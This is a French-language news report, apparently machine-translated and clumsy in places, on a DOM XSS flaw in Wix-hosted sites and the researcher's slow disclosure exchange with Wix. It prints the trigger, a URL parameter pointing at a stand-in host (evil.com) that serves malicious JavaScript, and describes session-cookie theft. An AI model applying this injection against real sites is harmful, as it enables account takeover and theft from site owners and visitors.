Avez-vous entendu parler de wix(.)avec?
Wix.com est une plate-forme de développement web basé sur un nuage conçu pour les utilisateurs de construire des sites web HTML5 et sites mobiles grâce à l'utilisation de ligne glisser-déposer des outils de l'entreprise.
Malheureusement, un bug XSS grave a été découvert sur la plate-forme mettant en danger actuellement des millions de sites Web et les utilisateurs.
Wix(.)com a un bug XSS grave, chercheur dit
Tel que rapporté par les chercheurs en sécurité, le service accueille des millions de sites Web avec 87 millions d'utilisateurs enregistrés. La partie effrayante est que tous les utilisateurs sont actuellement sujettes à cette vulnérabilité XSS. Ce dernier peut être déployé par des attaquants d'une manière de ver de prendre en charge les comptes d'administrateur. Une fois cela fait, les attaquants obtenir le plein contrôle sur les sites Web compromis.
La vulnérabilité XSS a été décrit par Matt Austin de sécurité de contraste. Il a écrit:
Wix.com a une vulnérabilité XSS DOM sévère qui permet un contrôle complet de l'attaquant sur un site Web hébergé chez Wix. Tout simplement en ajoutant un seul paramètre à tout site créé sur Wix, l'attaquant peut provoquer leur JavaScript doit être chargé et exécuté dans le cadre du site cible.
Une simple ligne de code suffit à déclencher le bug
L'attaque peut être déclenchée que par l'ajout d'une commande de redirection simple à une URL de wix(.)avec. Le résultat est redirigé vers JavaScrip malveillants. Voir un exemple ci-dessous:
- Ajouter: ?ReactSource = https://evil.com à une URL pour un site créé sur wix.com.
- Assurez-vous que evil.com héberge un fichier malveillant à /packages-bin/wixCodeInit/wixCodeInit.min.js
Ces simples lignes de code suffisent pour les attaquants afin d'être sûr que leur JS est chargé et activé dans le cadre du site Web ciblé, explique le chercheur. Les attaquants sont également en mesure d'accéder aux cookies et les ressources de la session admin, un très mauvais scénario bien. Chaque fois qu'un cookie de session est récolté, les attaquants peuvent librement positionner les DOM XSS dans un iframe. Ceci est fait pour héberger du contenu malveillant sur un site Web administré par un opérateur.
En cas de succès, cette attaque peut être mis à profit pour la distribution de logiciels malveillants, site modification, l'exploitation minière de crypto-monnaie, modifier les informations de compte, etc.
Qu'est-ce que Wix dit?
En ce qui concerne la communication avec wix(.)avec, les actions des chercheurs l'expérience suivante:
Octobre 10: Crée ticket de support demandant un contact de sécurité
Octobre 11: Tendez la main à @wix sur twitter pour trouver un contact de sécurité. Répondit utiliser support standard. Gave détails dans le billet créé. page Ticket ne fonctionne plus. https://www.wix.com/support/html5/contact.
Octobre 14: Reçu norme "Nous enquêtons sur la question et ferons un suivi le plus tôt possible" réponse de Wix.
Octobre 20: Répondre à un billet demandant une mise à jour. (pas de réponse)
Octobre 27: Deuxième demande d'une mise à jour. (pas de réponse)
Sur Octobre 28, le chercheur a finalement reçu un répondre qui a déclaré que le
groupe que vous avez essayé de contacter (sécurité) peut ne pas exister, ou vous ne pouvez pas avoir l'autorisation d'envoyer des messages au groupe.
Cependant, le PDG de Wix Avishai Abrahami a finalement admis que certains aspects de la plate-forme sont basés sur la bibliothèque open-source WordPress. Il affirme que tout ce qui a été amélioré a été libéré à la communauté, rapporte ZDNet.